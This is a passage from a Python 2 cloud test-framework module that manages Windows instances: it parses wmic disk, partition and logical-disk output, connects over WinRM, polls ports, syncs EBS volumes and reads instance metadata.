'''
Attempts to parse the serial number field from an EBS volume and find the correlating ebs volume
example format: vol-81C13EA4-dev-sdg
'''
if re.match("^vol-", self.serialnumber):
split = self.serialnumber.split('-')
self.ebs_volume = str(split[0]) + "-" + str(split[1])
self.ebs_cloud_dev = "/" + str(split[2]) + "/" + str(split[3])
else:
self.ebs_volume = ''
self.ebs_cloud_dev = ''
def update_ebs_info(self):
self.update_ebs_info_from_serial_number()
if not self.ebs_volume:
if self.index == 0 and self.win_instance.root_device_type == 'ebs':
bdm = self.win_instance.block_device_mapping[self.win_instance.root_device_name]
self.ebs_volume = bdm.volume_id
else:
for vol in self.win_instance.attached_vols:
if vol.guestdev == self.deviceid:
self.ebs_volume = vol.id
break
if not self.ebs_cloud_dev and self.ebs_volume:
volume = self.win_instance.tester.get_volume(volume_id=self.ebs_volume)
if hasattr(volume,'attach_data') and volume.attach_data:
self.ebs_cloud_dev = volume.attach_data.device
self.update_md5_info_from_ebs()
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 20
size = 16
sizegb = 7
ebsvol = 12
serialnumber = 24
caption = 36
part_count = 6
logical_ids = 8
cygdrive = 10
md5 = 32
header = "DISKDRIVE DEV ID".center(deviceid) + "|" + \
"SIZE B".center(size) + "|" + \
"SIZE GB".center(sizegb) + "|" + \
"EBS VOL".center(ebsvol) + "|" + \
"CAPTION".center(caption) + "|" + \
"PARTS".center(part_count) + "|" + \
"LOGICAL".center(logical_ids) + "|" + \
"CYGDRIVE".center(cygdrive) + "|" + \
"SERIAL NUMBER".center(serialnumber) + "|" + \
"MD5 CHECK SUM".center(md5) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.size_in_gb).center(sizegb) + "|" + \
str(self.ebs_volume).center(ebsvol) + "|" + \
str(self.caption).center(caption) + "|" + \
str(self.partitions).center(part_count) + "|" + \
str(",".join(str(x) for x in self.get_logicaldisk_ids())).center(logical_ids) + "|" + \
str(self.cygwin_scsi_drive).center(cygdrive) + "|" + \
str(self.serialnumber).center(serialnumber) + "|" + \
str(self.md5).center(md5) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstanceDiskPartition(WinInstanceDiskType):
def setup(self):
#self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(drive_id=self.deviceid)
self.logicaldisks = []
#Set values in case 'brief' was used when fetching partitions
if not hasattr(self,'deviceid'):
self.deviceid = self.name
if not hasattr(self,'bootable'):
self.bootable = self.bootpartition
if not hasattr(self,'diskindex'):
self.diskindex = self.get_disk_index_from_name()
def check_dict_requires(self, wmic_dict):
if not ('name' in wmic_dict and
'size' in wmic_dict and
'bootpartition' in wmic_dict and
'index' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, index and bootable')
def get_disk_index_from_name(self):
diskindex = None
diskindexstring = self.name.split(',')[0]
if re.search('disk', diskindexstring, re.IGNORECASE):
diskindex = int(diskindexstring.split('#')[1])
return diskindex
def get_logicaldisk_ids(self):
retlist = []
for disk in self.logicaldisks:
retlist.append(disk.deviceid)
return retlist
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 24
size = 16
sizegb = 12
sizemb = 12
bootable = 10
header = "PARTITION DEV ID".center(deviceid) + "|" + \
"SIZE B".center(size) + "|" + \
"SIZE GB".center(sizegb) + "|" + \
"SIZE MB".center(sizemb) + "|" + \
"BOOTABLE".center(bootable) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.size_in_gb).center(sizegb) + "|" + \
str(self.size_in_mb).center(sizemb) + "|" + \
str(self.bootable).center(bootable) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstanceLogicalDisk(WinInstanceDiskType):
def setup(self):
self.cygwin_scsi_drive = self.win_instance.get_cygwin_scsi_dev_for_windows_drive(windisk=self)
self.partition = None
def check_dict_requires(self, wmic_dict):
if not ('deviceid' in wmic_dict and
'size' in wmic_dict and
'description' in wmic_dict and
'freespace' in wmic_dict and
'filesystem' in wmic_dict):
raise Exception('wmic_dict passed does not contain needed attributes; deviceid, size, and description')
def get_summary(self, printheader=True, printmethod=None):
buf = ""
deviceid = 24
size = 16
freespace = 16
filesystem = 24
description = 30
cygdrive = 10
header = "LOGICAL DEV ID".center(deviceid) + "|" + \
"SIZE".center(size) + "|" + \
"FREE SPACE".center(freespace) + "|" + \
"FILE SYSTEM".center(filesystem) + "|" + \
"DESCRIPTION".center(description) + "|" + \
"CYGDRIVE".center(cygdrive) + "|"
summary = str(self.deviceid).center(deviceid) + "|" + \
str(self.size).center(size) + "|" + \
str(self.freespace).center(freespace) + "|" + \
str(self.filesystem).center(filesystem) + "|" + \
str(self.description).center(description) + "|" + \
str(self.cygwin_scsi_drive).center(cygdrive) + "|"
length = len(header)
if len(summary) > length:
length = len(summary)
line = get_line(length)
if printheader:
buf += line + header + line
buf += summary + line
if printmethod:
printmethod(buf)
return buf
class WinInstance(Instance, TaggedResource):
gigabyte = 1073741824
megabyte = 1048576
@classmethod
def make_euinstance_from_instance(cls,
instance,
tester,
debugmethod = None,
keypair=None,
keypath=None,
password=None,
username="Administrator",
auto_connect = True,
verbose=True,
timeout=120,
private_addressing = False,
reservation = None,
cmdstart=None,
try_non_root_exec=True,
winrm_port='5985',
winrm_protocol='http',
rdp_port='3389',
rootfs_device = "sda",
block_device_prefix = "sd",
bdm_root_vol = None,
virtio_blk = True,
cygwin_path = None,
disk_update_interval=10,
retry=2,
brief=False
):
'''
Primary constructor for this class. Note: to avoid an ssh session within this method, provide keys, username/pass later.
Arguments:
instance - mandatory- a Boto instance object used to build this euinstance object
keypair - optional- a boto keypair object used for creating ssh connection to the instance
username - optional- string used to create ssh connection as an alternative to keypair
password - optional- string used to create ssh connection to this instance as an alternative to keypair
exec_password -optional -string used for su or sudo where prompted for password, will default to 'password'
auto_connect -optional -boolean, if True will attempt to automatically create an ssh session for this instance
try_non_root_exec -optional -boolean, if True will attempt to use sudo if available else su -c to execute privileged commands
timeout - optional- integer used for ssh connection timeout
debugmethod - optional - method, used for debug output
verbose - optional - boolean to determine if debug is to be printed using debug()
retry - optional - integer, ssh connection attempts for non-authentication failures
'''
newins = WinInstance(instance.connection)
newins.__dict__ = instance.__dict__
newins.tester = tester
newins.winrm_port = winrm_port
newins.rdp_port = rdp_port
newins.bdm_root_vol = None
newins.winrm_protocol = winrm_protocol
newins.debugmethod = debugmethod
if newins.debugmethod is None:
newins.log = eulogger.Eulogger(identifier= str(instance.id))
newins.debugmethod= newins.log.debug
if (keypair is not None):
if isinstance(keypair,types.StringTypes):
keyname = keypair
keypair = tester.get_keypair(keyname)
else:
keyname = keypair.name
newins.keypath = keypath or os.getcwd() + "/" + keyname + ".pem"
newins.keypair = keypair
newins.password = password
newins.username = username
newins.verbose = verbose
newins.attached_vols=[]
newins.timeout = timeout
newins.virtio_blk = virtio_blk
newins.disk_update_interval = disk_update_interval
newins.retry = retry
newins.brief = brief
newins.rootfs_device = rootfs_device
newins.block_device_prefix = block_device_prefix
newins.private_addressing = private_addressing
newins.reservation = reservation or newins.get_reservation()
if newins.reservation:
newins.security_groups = newins.tester.get_instance_security_groups(newins)
else:
newins.security_groups = None
newins.laststate = newins.state
newins.cmdstart = cmdstart
newins.auto_connect = auto_connect
newins.set_last_status()
newins.update_vm_type_info()
newins.cygwin_path = cygwin_path
newins.system_info = None
newins.diskdrives = []
newins.disk_partitions = []
newins.logicaldisks = []
newins.cygwin_dev_map = {}
#newins.set_block_device_prefix()
if newins.root_device_type == 'ebs':
try:
volume = newins.tester.get_volume(volume_id = newins.block_device_mapping.get(newins.root_device_name).volume_id)
newins.bdm_root_vol = EuVolume.make_euvol_from_vol(volume, tester=newins.tester,cmdstart=newins.cmdstart)
except:pass
newins.winrm = None
if newins.auto_connect and newins.state == 'running':
newins.connect_to_instance(timeout=timeout)
return newins
@property
def age(self):
launchtime = self.tester.get_datetime_from_resource_string(self.launch_time)
# return the elapsed time in seconds
return (time.mktime(datetime.utcnow().utctimetuple()) -
time.mktime(launchtime.utctimetuple()))
def update(self, validate=False, dry_run=False,
err_state='terminated', err_code=-1):
ret = None
tb = ""
retries = 2
for x in xrange(0, retries):
try:
#send with validation True, fail later...
ret = super(WinInstance, self).update(validate=True,
dry_run=dry_run)
break
except ValueError:
if validate:
raise
tb = self.tester.get_traceback()
self.debug('Failed to update instance. Attempt:{0}/{1}'
.format(x, retries))
if not ret:
failmsg = 'Failed to update instance. Instance may no longer ' \
'be present on system"{0}"'.format(self.id)
self.debug('{0}\n{1}'.format(tb, failmsg))
self.debug('{0} setting fake state to:"{1}"'.format(self.id,
err_state))
state = InstanceState(name=err_state, code=err_code)
self._state = state
ret = self.state
self.set_last_status()
return ret
def update_vm_type_info(self):
self.vmtype_info = self.tester.get_vm_type_from_zone(self.placement,self.instance_type)
return self.vmtype_info
def set_last_status(self,status=None):
self.laststate = self.state
self.laststatetime = time.time()
self.age_at_state = self.tester.get_instance_time_launched(self)
#Also record age from user's perspective, ie when they issued the run instance request (if this is available)
if self.cmdstart:
self.age_from_run_cmd = "{0:.2f}".format(time.time() - self.cmdstart)
else:
self.age_from_run_cmd = None
def print_dict(self, dict=None, printmethod=None):
'''
formats and prints
'''
printmethod = printmethod or self.debug
buf = "\n"
dict = dict or self.__dict__
longest_key = 0
for key in dict:
if len(key) > longest_key:
longest_key = len(key)
for key in dict:
buf += str(key).ljust(longest_key) + " -----> :" + str(dict[key]) + "\n"
printmethod(buf)
def printself(self, title=True, footer=True, printmethod=None, printme=True):
def state_markup(state):
# Markup instance state...
if state == 'running':
return markup(state, markups=[1, 92])
if state == 'terminated':
return markup(state, markups=[1, 97])
if state == 'shutting-down':
return markup(state, markups=[1, 95])
if state == 'pending':
return markup(state, markups=[1, 93])
if state == 'stopped':
return markup(state, markups=[1, 91])
else:
return markup(state, markups=[1, 91])
def multi_line(lines):
# Utility method for creating multi line table entries...
buf = ""
maxlen = 0
for line in lines:
if len(line) + 2 > maxlen:
maxlen = len(line) + 2
for line in lines:
buf += str(line).ljust(maxlen) + "\n"
buf = buf.rstrip()
return (buf, maxlen)
bdmvol = self.root_device_type
if self.bdm_root_vol:
bdmvol += ":" + self.bdm_root_vol.id
reservation_id = None
if self.reservation:
reservation_id = self.reservation.id
owner_id = self.reservation.owner_id
else:
owner_id = "???"
# Create a multi line field for instance's run info
idlist = [markup("{0} {1}".format('ID:', self.id), markups=[1, 4, 94]),
"{0} {1}".format(markup('TYPE:'), self.instance_type),
"{0} {1}".format(markup('RES:'), reservation_id),
"{0}".format(markup("ACCOUNT ID:")), owner_id]
id_string, idlen = multi_line(idlist)
try:
emi = self.tester.get_emi(self.image_id)
emi_name = str(emi.name[0:18]) + ".."
except:
emi_name = ""
# Create a multi line field for the instance's image info
virt_type = 'PV'
if self.virtualization_type == 'hvm':
virt_type = 'HVM'
emi_string, emilen = multi_line(
[markup("{0} {1}".format('EMI:', self.image_id)),
"{0} {1}".format(markup('OS:'), self.platform or 'linux'),
"{0} {1}".format(markup('VIRT:'), virt_type),
"{0}".format(markup('IMAGE NAME:')),
emi_name])
# Create a multi line field for the instance's state info
if self.age:
age = int(self.age)
state_string, state_len = multi_line(["STATE: " + state_markup(self.laststate),
"{0} {1}".format(markup('AGE:'), age),
"{0} {1}".format(markup("ZONE:"), self.placement),
markup('ROOTDEV:'), bdmvol])
# Create the primary table called pt...
netinfo = 'INSTANCE NETWORK INFO:'
idheader = 'INSTANCE ID'
imageheader = 'INSTANCE IMAGE'
stateheader = 'INSTANCE STATE'
pt = PrettyTable([idheader, imageheader, stateheader, netinfo])
pt.align[netinfo] = 'l'
pt.valign[netinfo] = 'm'
pt.align[idheader] = 'l'
pt.align[imageheader] = 'l'
pt.align[stateheader] = 'l'
pt.max_width[idheader] = idlen
pt.max_width[imageheader] = emilen
pt.max_width[stateheader] = state_len
pt.padding_width = 0
pt.hrules = ALL
# PrettyTable headers do not work with ascii markups, so make a sudo header
new_header = []
for field in pt._field_names:
new_header.append(markup(field, markups=[1, 4]))
pt.add_row(new_header)
pt.header = False
# Create a subtable 'netpt' to summarize and format the networking portion...
# Set the maxwidth of each column so the tables line up when showing multiple instances
vpc_col = ('VPC', 4)
subnet_col = ('SUBNET', 6)
if self.vpc_id:
vpc_col = ('VPC', 12)
subnet_col = ('SUBNET', 15)
secgrp_col = ('SEC GRPS', 11)
privaddr_col = ('P', 1)
privip_col = ('PRIV IP', 15)
pubip_col = ('PUB IP', 15)
net_cols = [vpc_col, subnet_col, secgrp_col, privaddr_col, privip_col, pubip_col]
# Get the Max width of the main tables network summary column...
# Start with 2 to account for beginning and end column borders
netinfo_width = 2
netinfo_header = []
for col in net_cols:
netinfo_width += col[1] + 1
netinfo_header.append(col[0])
pt.max_width[netinfo] = netinfo_width
netpt = PrettyTable([vpc_col[0], subnet_col[0], secgrp_col[0], privaddr_col[0],
privip_col[0], pubip_col[0]])
netpt.padding_width = 0
netpt.vrules = ALL
for col in net_cols:
netpt.max_width[col[0]] = col[1]
sec_grps = []
for grp in self.groups:
sec_grps.append(str(grp.id))
sec_grps = ",".join(sec_grps)
private_addressing = "N"
if self.private_addressing:
private_addressing = "Y"
netpt.add_row([str(self.vpc_id).center(vpc_col[1]),
str(self.subnet_id).center(subnet_col[1]),
str(sec_grps).center(secgrp_col[1]),
str(private_addressing).center(privaddr_col[1]),
str(self.private_ip_address).center(privip_col[1]),
str(self.ip_address).center(pubip_col[1])])
# To squeeze a potentially long keyname under the network summary table, get the length
# and format this column to allow for wrapping a keyname under the table...
# netbuf = netpt.get_string()
netbuf = "{0}:{1} {2}:{3}\n".format(markup("NODE"),
self.tags.get('euca:node', "???").ljust(16),
markup("KEYPAIR"), self.key_name)
netbuf += "\n".join(netpt.get_string().splitlines()[0:-1])
# Create the row in the main table...
pt.add_row([id_string, emi_string, state_string, netbuf])
if printme:
printmethod = printmethod or self.log.debug
printmethod("\n" + str(pt) + "\n")
return pt
def get_password(self,
private_key_path=None,
key=None,
dir=None,
exten=".pem",
encoded=True,
force_update=False):
'''
:param private_key_path: private key file used to decrypt password
:param key: name of private key
:param dir: Path to private key
:param exten: extension of private key
:param encoded: boolean of whether string returned from server is
Base64 encoded
:return: decrypted password
'''
if self.password is None or force_update:
self.password = self.tester.get_windows_instance_password(
self,
private_key_path=private_key_path,
key=key,
dir=dir,
exten=exten,
encoded=encoded)
return self.password
def reset_ssh_connection(self, timeout=None):
# todo: Remove ssh reference from this method, use something like
# reset_instance_connection, etc..
self.debug('Note ssh not implemented at this time, using winrm for '
'shell access instead...')
return self.reset_winrm_connection(timeout=timeout)
def reset_winrm_connection(self, timeout=None, force=False):
# todo:
timeout = timeout or self.timeout
self.debug('reset_winrm_connection for:'+str(self.id))
self.get_password(force_update=True)
if self.username is None or self.password is None:
#Allow but warn here as this may be a valid negative test
self.debug('Warning username and/or password were None in '
'winrm connnection?')
# Create a new winrm interface if this is a new instance or
# an attribute has changed...
try:
#Check the port in order to provide debug if the connection fails
self.test_port_status(port=self.winrm_port, ip=self.ip_address)
except:pass
if force or not (self.winrm and \
self.winrm.hostname == self.ip_address and \
self.winrm.username == self.username and \
self.winrm.password == self.password):
if self.winrm:
self.winrm.close_shell()
self.winrm = winrm_connection.Winrm_Connection(
hostname = self.ip_address,
username = self.username,
password = self.password,
port = self.winrm_port,
protocol = self.winrm_protocol,
debug_method = self.debug,
verbose=True
)
def get_reservation(self):
res = None
try:
res = self.tester.get_reservation_for_instance(self)
except Exception, e:
self.update()
self.debug('Could not get reservation for instance in state:' +
str(self.state) + ", err:" + str(e))
return res
def connect_to_instance(self, wait_for_boot=180, timeout=120):
'''
Attempts to connect to an instance via ssh.
:params wait_for_boot: time to wait, allowing guest to boot before
attempting to poll for ports active status
:params timeout: -optional - time in seconds to wait when polling
port(s) status(s) before failure
'''
self.debug("{0}connect_to_instance starting.\nwait_for_boot:{1} "
"seconds\ntimeout from boot:{2}{3}"
.format(termline, wait_for_boot, timeout, termline))
try:
self.poll_for_port_status_with_boot_delay(waitforboot=wait_for_boot,
timeout=timeout)
except Exception, e:
self.debug('Warning failed to poll port status:' + str(e))
self.debug("Attempting to create connection to instance:" + self.id)
attempts = 0
start = time.time()
elapsed = 0
if self.winrm is not None:
self.winrm.close_shell()
self.winrm = None
while (elapsed < timeout):
attempts += 1
try:
self.update()
self.reset_winrm_connection()
self.debug('Try some sys...')
self.sys("whoami")
except Exception, se:
tb = self.tester.get_traceback()
self.debug('Caught exception attempting to connect '
'winrm shell:\n'+ str(tb) + str(se))
elapsed = int(time.time()-start)
self.debug('connect_to_instance: Attempts:' + str(attempts) +
', elapsed:'+str(elapsed)+'/'+str(timeout))
if self.winrm is not None:
self.winrm.close_shell()
self.winrm = None
time.sleep(5)
pass
else:
break
elapsed = int(time.time()-start)
if self.winrm is None:
self.get_connection_debug()
raise RuntimeError(str(self.id) +
":Failed establishing management connection to "
"instance, elapsed:" + str(elapsed) +
"/" + str(timeout))
self.debug('Connect_to_instance updating attached volumes/disk '
'info for vols: ' + str(self.attached_vols))
if self.brief:
self.update_system_info()
else:
self.update_system_and_disk_info()
self.init_attached_volumes()
self.debug("{0}connect_to_instance completed{1}"
.format(termline, termline))
def get_connection_debug(self):
# Add network debug/diag info here...
# First show arp cache from local machine
# todo Consider getting info from relevant euca components:
# - iptables info
# - route info
# - instance xml
try:
# Show local ARP info...
arp_out = "\nLocal ARP cache for instance ip: " \
+ str(self.ip_address) + "\n"
arp_fd = os.popen('arp ' + str(self.ip_address))
for line in arp_fd:
arp_out += line
self.debug(arp_out)
except Exception as AE:
self.log.debug('Failed to get arp info:' + str(AE))
try:
self.tester.get_console_output(self)
except Exception as CE:
self.log.debug('Failed to get console output:' + str(CE))
def update_root_device_diskdrive(self):
if not self.root_device_type == 'ebs':
return
for disk in self.diskdrives:
if disk.index == 0:
if disk.ebs_volume:
for vol in self.attached_vols:
if vol.id == disk.ebs_volume:
if not disk.md5:
disk.update_md5_info_from_ebs()
return
volume = self.tester.get_volume(volume_id=disk.ebs_volume)
if not isinstance(volume, EuVolume):
volume = EuVolume.make_euvol_from_vol(volume, self.tester)
volume.guestdev = disk.deviceid
volume.md5len = 1024
volume.md5 = self.get_dev_md5(disk.cygwin_scsi_drive, volume.md5len)
if not self.get_volume_from_attached_list_by_id(volume.id):
self.debug("{0} updating with root vol:{1}{2}"
.format(termline,
volume.id,
termline))
self.attached_vols.append(volume)
disk.update_md5_info_from_ebs()
return
def get_volume_from_attached_list_by_id(self, volume_id):
for vol in self.attached_vols:
if vol.id == volume_id:
return vol
def update_system_and_disk_info(self):
try:
self.update_system_info()
except Exception, sie:
tb = self.tester.get_traceback()
self.debug(str(tb) + "\nError updating system info:" + str(sie))
try:
self.update_disk_info()
self.update_root_device_diskdrive()
self.print_partition_summary()
self.print_logicaldisk_summary()
self.print_diskdrive_summary()
except Exception, ude:
tb = self.tester.get_traceback()
self.debug(str(tb) + "\nError updating disk info:" + str(ude))
def has_sudo(self):
return False
def debug(self,msg,traceback=1,method=None,frame=False):
'''
Used to print debug, defaults to print() but over ridden by self.debugmethod if not None
msg - mandatory -string, message to be printed
'''
if ( self.verbose is True ):
self.debugmethod(msg)
def sys(self, cmd, verbose=True, code=None, include_stderr=False, enable_debug=False, timeout=None):
'''
Issues a command against the ssh connection to this instance
Returns a list of the lines from stdout+stderr as a result of the command
cmd - mandatory - string, the command to be executed
verbose - optional - boolean flag to enable debug
timeout - optional - command timeout in seconds
'''
if (self.winrm is None):
raise Exception("WinInstance winrm connection is None")
return self.winrm.sys(command=cmd, include_stderr=include_stderr, timeout=timeout, verbose=verbose, code=code)
def test_rdp_port_status(self, ip=None, port=3389, timeout=10):
'''
Description: Attempts to test that the host is accepting tcp connections to the RDP port
'''
ip = ip or self.ip_address
return self.test_port_status(ip=ip, port=port, timeout=timeout)
def test_port_status(self, port, ip=None, timeout=5, tcp=True, verbose=True):
ip = ip or self.ip_address
return self.tester.test_port_status(ip, int(port), timeout=timeout, tcp=tcp, verbose=verbose)
def poll_for_port_status_with_boot_delay(self, interval=15, ports=[], socktimeout=5,timeout=180, waitforboot=300):
'''
Make sure some time has passed before we test on the guest side before running guest test...
'''
launch_seconds = self.tester.get_instance_time_launched(self)
sleeptime = 0 if launch_seconds > waitforboot else (waitforboot - launch_seconds)
self.debug("Instance was launched "+str(launch_seconds)+" seconds ago, waiting:"+str(sleeptime)+" for instance to boot")
time.sleep(sleeptime)
return self.poll_for_ports_status(ports,
ip=self.ip_address,
interval=interval,
socktimeout=socktimeout,
timeout=timeout)
def wait_for_time_since_launch(self,waitforboot=420):
'''
When using larger instance store images, this can allow for the delays caused by image size/transfer.
'''
boot_seconds = self.tester.get_instance_time_launched(self)
sleeptime = 0 if boot_seconds > waitforboot else (waitforboot - boot_seconds)
self.debug("Instance was launched "+str(boot_seconds)+"/"+str(waitforboot) + " seconds ago, waiting:"+str(sleeptime)+" for instance to boot")
start = time.time()
elapsed = 0
print "Waiting for Windows to fully boot:",
while elapsed < sleeptime:
print "Waiting for Windows to fully boot:"+str(sleeptime-elapsed),
time.sleep(5)
elapsed=int(time.time()-start)
self.debug("test_wait_for_instance_boot: done waiting, instance up for "+str(waitforboot)+" seconds")
def poll_for_ports_status(self, ports=[], ip=None, interval=10, socktimeout=5, timeout=180):
ip = ip or self.ip_address
ports = ports or [self.rdp_port, self.winrm_port]
start = time.time()
elapsed = 0
attempt = 0
while elapsed < timeout:
attempt +=1
self.debug('test_poll_for_ports_status, ports: ' + ",".join(str(x) for x in ports) + ", attempt:" + str(attempt))
for port in ports:
if elapsed < timeout:
try:
self.debug('Trying ip:port:' + str(self.ip_address) + ':' + str(port) + ", elapsed:" + str(elapsed))
self.test_port_status(ip=ip, port=int(port), timeout=5)
return
except socket.error, se:
self.debug('test_ports_status failed socket error:'+str(se[0]))
#handle specific errors here, for now just for debug...
ecode=se[0]
if ecode == socket.errno.ETIMEDOUT or ecode == "timed out":
self.debug("test_poll_for_ports_status: Connect "+str(ip)+":" +str(port)+ " timed out retrying. Time remaining("+str(timeout-elapsed)+")")
except Exception, e:
tb = self.tester.get_traceback()
self.debug(tb)
self.debug('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+', err:'+str(e) )
elapsed = int(time.time() -start)
if elapsed < timeout:
time.sleep(interval)
raise Exception('test_poll_for_ports_status:'+str(ip)+':'+str(port)+' FAILED after attempts:'+str(attempt)+', elapsed:'+str(elapsed)+' seconds')
def init_attached_volumes(self):
self.debug('init_attahced_volumes... attached_vols: ' + str(self.attached_vols))
syncdict = self.sync_attached_volumes_with_clouds_view()
if syncdict['errors']:
errmsg = 'Errors syncing guest volumes with cloud at init:' + ",".join(str(e) for e in syncdict['errors'])
errmsg += 'Failed to sync guest volumes with cloud at init:' + ",".join(str(x) for x in syncdict['badvols'])
self.debug(errmsg)
time.sleep(60)
raise Exception(errmsg)
def sync_attached_volumes_with_clouds_view(self):
self.debug(termline +
"Starting sync_attached_volumes_with_clouds_view"
+ termline )
badvols = []
errors = []
ret = {'errors':errors, 'badvols':badvols}
#Get a list of volumes that the cloud believes are currently attached
cloud_volumes = self.tester.get_volumes(attached_instance=self.id)
#Make a copy of a list of volumes this instance thinks are currenlty attached
locallist = copy.copy(self.attached_vols)
self.debug('Cloud list:' + str(cloud_volumes))
self.debug('Local list:' + str(locallist))
for vol in cloud_volumes:
for local_vol in locallist:
if local_vol.id == vol.id:
locallist.remove(local_vol)
if not isinstance(vol, EuVolume):
vol = EuVolume.make_euvol_from_vol(vol, self.tester)
try:
self.update_volume_guest_info(volume=vol)
except Exception, e:
badvols.append(vol)
errors.append(vol.id + ' Error syncing with cloud:' + str (e) + '. \n')
for local_vol in locallist:
badvols.append(local_vol)
errors.append(local_vol.id + ' Error unattached volume found in guests attach list. \n')
self.debug(termline +
"Finishing sync_attached_volumes_with_clouds_view"
+ termline )
return ret
def update_system_info(self):
'''
Gather basic system info for this windows instance object and store in self.system_info
Example:
# print wins.system_info.OS_NAME
'Microsoft Windows 7 Professional'
'''
currentkey = None
swap = re.compile('([!@#$%^&*. ])')
info = self.sys('systeminfo')
if self.system_info:
system_info = self.system_info
else:
system_info = type('obj', (object,),{})
if info:
for line in info:
if re.match("^\w.+:", line):
linevals = line.split(':')
currentkey = linevals.pop(0)
#clean up the key string...
currentkey = re.sub('[()]', '', currentkey)
currentkey = re.sub(swap, '_', currentkey)
currentkey = currentkey.lower()
value = ":".join(str(x) for x in linevals) or ""
setattr(system_info, currentkey, str(value).strip())
elif currentkey:
#this is an additional value to our previous key
prev_value = getattr(system_info, currentkey)
if not isinstance(prev_value, types.ListType):
updated_value = [prev_value]
updated_value.append(str(line).strip())
setattr(system_info, currentkey, updated_value)
self.system_info = system_info
def get_cygwin_path(self, prefix="c:\\"):
if self.cygwin_path:
return self.cygwin_path
path = None
self.debug('Trying to find cygwin path...')
out = self.sys('dir ' + str(prefix) + ' /B')
for line in out:
if re.search('cygwin', line):
path = str(prefix) + str(line.strip()) + "\\"
self.cygwin_path = path
break
return path
def cygwin_curl(self, url, connect_timeout=30):
cygpath = self.get_cygwin_path()
if cygpath is None:
raise Exception('Could not find cygwin path on guest for curl?')
curl = cygpath + 'bin\curl.exe --connect-timeout ' + str(connect_timeout) + ' '
return self.sys(curl + str(url), code=0, timeout=connect_timeout)
def get_metadata(self, element_path='', prefix='latest/meta-data/', use_cygwin=True):
"""Return the lines of metadata from the element path provided"""
### If i can reach the metadata service ip use it to get metadata otherwise try the clc directly
try:
if use_cygwin:
return self.cygwin_curl("http://169.254.169.254/"+str(prefix)+str(element_path), connect_timeout=10)
else:
return self.sys("curl --connect-timeout 10 http://169.254.169.254/"+str(prefix)+str(element_path), code=0)
except:
if use_cygwin:
return self.cygwin_curl("http://" + self.tester.get_ec2_ip() + ":8773/"+str(prefix) + str(element_path))
else:
return self.sys("curl http://" + self.tester.get_ec2_ip() + ":8773/"+str(prefix) + str(element_path), code=0)
def print_diskdrive_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.diskdrives:
printmethod('No disk drives to print?')
return
disklist = copy.copy(self.diskdrives)
buf = (disklist.pop()).get_summary()
for disk in disklist:
buf += disk.get_summary(printheader=False)
printmethod(buf)
def print_partition_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.disk_partitions:
printmethod('No disk partitions to print?')
return
partlist = copy.copy(self.disk_partitions)
buf = (partlist.pop()).get_summary()
for part in partlist:
buf += part.get_summary(printheader=False)
printmethod(buf)
def print_logicaldisk_summary(self,printmethod=None):
printmethod = printmethod or self.debug
if not self.logicaldisks:
printmethod('No disk disk_partitions to print?')
return
disklist = copy.copy(self.logicaldisks)
buf = (disklist.pop()).get_summary()
for disk in disklist:
buf += disk.get_summary(printheader=False)
printmethod(buf)
def update_disk_info(self , forceupdate=False):
if self.diskdrives:
if not forceupdate and (time.time() - self.diskdrives[0].last_updated) <= self.disk_update_interval:
return
self.debug('Fetching updated disk info...')
self.diskdrives = []
self.disk_partitions = []
self.logicaldisks = []
self.diskdrives = self.get_updated_diskdrive_info()
self.disk_partitions = self.get_updated_partition_info()
self.logicaldisks = self.get_updated_logicaldisk_info()
self.associate_diskdrives_to_partitions()
self.associate_partitions_to_logicaldrives()
def get_updated_diskdrive_info(self):
'''
Populate self.diskdrives with WinInstanceDisk objects containing info parsed from wmic command.
Since wmic doesn't seem to use delimeters this method attempts to derive the lengh of each column/header
in order to parse out the info per disk.
:pararm force: boolean. Will force an update, otherwise this method will wait a minimum of
self.disk_update_interval before updating again.
'''
#cmd = "wmic diskdrive get /format:textvaluelist.xsl"
self.debug('Getting updated diskdrive info...')
cmd = "wmic diskdrive list full"
diskdrives = []
for disk_dict in self.get_parsed_wmic_command_output(cmd):
try:
diskdrives.append(WinInstanceDiskDrive(self,disk_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceDiskDrive from following dict:')
self.print_dict(dict=disk_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceDiskDrive:" + str(e))
self.debug('get_updated_diskdrive_info, Done')
return diskdrives
def get_updated_partition_info(self):
'''
Populate self.diskdrives with WinInstanceDisk objects containing info parsed from wmic command.
Since wmic doesn't seem to use delimeters this method attempts to derive the lengh of each column/header
in order to parse out the info per disk.
:pararm force: boolean. Will force an update, otherwise this method will wait a minimum of
self.disk_update_interval before updating again.
'''
self.debug('Getting udpated partition info...')
cmd = "wmic partition list brief /format:textvaluelist.xsl"
disk_partitions = []
for part_dict in self.get_parsed_wmic_command_output(cmd):
try:
disk_partitions.append(WinInstanceDiskPartition(self,part_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceDiskPartition from following dict:')
self.print_dict(dict=part_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceDiskPartition:" + str(e))
self.debug('get_updated_partition_info, Done')
return disk_partitions
def get_updated_logicaldisk_info(self):
self.debug('Getting updated logicaldisk info...')
cmd ='wmic logicaldisk list /format:textvaluelist.xsl'
logicaldisks = []
for part_dict in self.get_parsed_wmic_command_output(cmd):
try:
logicaldisks.append(WinInstanceLogicalDisk(self,part_dict))
except Exception, e:
tb = self.tester.get_traceback()
self.debug('Error attempting to create WinInstanceLogicalDisk from following dict:')
self.print_dict(dict=part_dict)
raise Exception(str(tb) + "\n Error attempting to create WinInstanceLogicalDisk:" + str(e))
